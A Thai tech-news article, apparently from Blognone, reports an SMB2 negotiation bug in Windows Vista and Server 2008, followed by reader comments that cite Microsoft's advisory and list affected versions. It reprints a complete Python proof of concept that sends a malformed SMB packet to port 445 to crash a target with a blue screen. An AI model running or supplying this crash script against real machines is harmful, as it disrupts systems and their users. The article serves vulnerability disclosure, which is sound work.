พบบั๊กในไฟล์ SMB2.SYS ซึ่งเป็นไฟล์ที่ใช้สำหรับโพรโตคอลแชร์ไฟล์ SMB2 ส่งผลถึงระบบปฎิบัติการของไมโครซอฟท์นับแต่วิสต้าเป็นต้นมาเสี่ยงต่อการถูกยิงจากเครื่องในเครือข่ายจนทำให้ระบบล่ม
ลงลึกไปกว่านั้น บั๊กนี้พบในส่วนของการเจรจาเพื่อเปิดการเชื่อมต่อ SMB โดยในฟิลด์ Process ID High นั้นหากมีอักขระ "&" เข้าไปก็จะทำให้ระบบในส่วนนี้ล้มเหลวจนพาทั้งระบบปฎิบัติการล่มและนำไปสู่ "จอฟ้า" ในที่สุด
คาดว่าทุกเครื่องที่เปิดการทำงานของโพรโตคอล SMB2 ไว้จะเสี่ยงต่อบั๊กนี้ทั้งหมด อย่างไรก็ตามยังไม่มีการรายงานว่าบั๊กนี้ส่งผลถึง Windows Server 2008 แน่หรือไม่
โพรโตคอล SMB2 มักใช้ในเครือข่าย LAN เป็นหลัก ดังนั้นบั๊กนี้อาจจะไม่น่ากลัวมากเท่าที่คิด แต่หากสอบๆ อยู่แล้วเพื่อนโต๊ะข้างๆ ยิงจอฟ้าทั้งวันคงไม่สนุกเหมือนกัน
ตัวอย่างโค้ดอยู่หลัง break
ที่มา - seclists.org
!/usr/bin/python
When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Get latest news from Blognone
Follow @twitterapi
Blognone Jobs Premium
Cloudnone
- Kubernetes คืออะไร [Part 1] เกิดขึ้นมาอย่างไร? ทำไมต้องใช้มัน? | Cloudnone EP.14
- CI/CD ยังไงดี ตั้งเซิร์ฟเวอร์เอง vs เช่าคลาวด์ | Cloudnone EP.13
- รู้จักโน้ตบุ๊กบนคลาวด์ เช่าใช้งาน Jupyter Notebook ที่ไหนดี | Cloudnone Ep.12
- สรุปข่าวใหญ่ปี 23 และคาดการณ์เทรนด์ปี 24 ในวงการ Cloud | Cloudnone EP.11
- สรุปของใหม่และสาระสำคัญจาก AWS re:Invent 2023 | Cloudnone Special EP
Comments
บรรทัดแรก "แชร์ไฟล์" นะครับ ไม่ใช่ "แชร์ไหล์ "
แก้เรียบร้อยครับ
LewCPE
lewcpe.com, @wasonliw
เวลาอ่านที่มี "xxx อยู่หลังเบรก" แล้วให้อารมณ์ดูรายการทีวี
"...และพบกับโค้ดหลังเบรก ครู่เดียวครับ!" แล้วตัดเข้าโฆษณา
เดี๋ยวได้เล่นมุข
ปกติ Conflicker มันก็ใส่มาทั้งชุดอยู่แล้วนิ ทั้ง 139,445 ถ้ามันฝังไวรัสไม่ได้มันก็ DDoS เอา เลยโดนพักเบรกสักครู่ แล้วกลับมาชมกันต่อ - -*
สุดท้ายก็เลยปิดพอร์ตทั้งสองนี่ซะ หมดปัญหาไปพักใหญ่ๆ
ถูงยิง -> ถูกยิง
"อาจะไม่น่ากลัว" -> "อาจจะไม่น่ากลัว"ครับ :)
ไมโครซอฟท์ออกวิธีการแก้ไขเฉพาะหน้า (workaround) แล้ว ดูได้ที่นี่
ที่มา: Microsoft Security Advisory (975497) ผ่าน Ars Technica
Windows 7 Professional on my ThinkPad T61 is very stable!
โค้ดเหมือนจะผิดนะครับ
น่าจะอยู่อีกบรรทัดนึง
onedd.net
onedd.net
แก้แล้วนะครับ
LewCPE
lewcpe.com, @wasonliw
Affected Software
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Non-Affected Software
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
ถ้าตามนี้ เหมือน Windows 7 จะรอดอยู่แล้วนะครับ
The Phantom Thief
อันนี้คือจากไหนหรือครับ
แต่ก็มี win 7 ในรายการนะ
LewCPE
lewcpe.com, @wasonliw
มาจากคุณ nuntawat ด้านบนเนี้ยครับ >> http://www.microsoft.com/technet/security/advisory/975497.mspx
ส่วนที่มี 7 ด้วยนี่คือผมแบ่งบรรทัดผิดเอง ก็อบมาแล้วไม่ได้ตรวจก่อนทำให้อ่านแล้วคลาดเคลื่อนในความหมายได้ ต้องขออภัยด้วยครับ ที่จริงเป็นแบบนี้
Affected Software (ได้รับผลกระทบ)
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Non-Affected Software (ไม่กระทบ)
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
The Phantom Thief
แอบเปิดเผยบั๊กแล้วล่อให้ย้ายไป 7 นี่ฟว่า
ลง XP ใหม่แล้วต้องมาคอยแพทซ์ไอ้ตัวนี้ไม่หนุกนา
\(@^_^@)/
M R T O M Y U M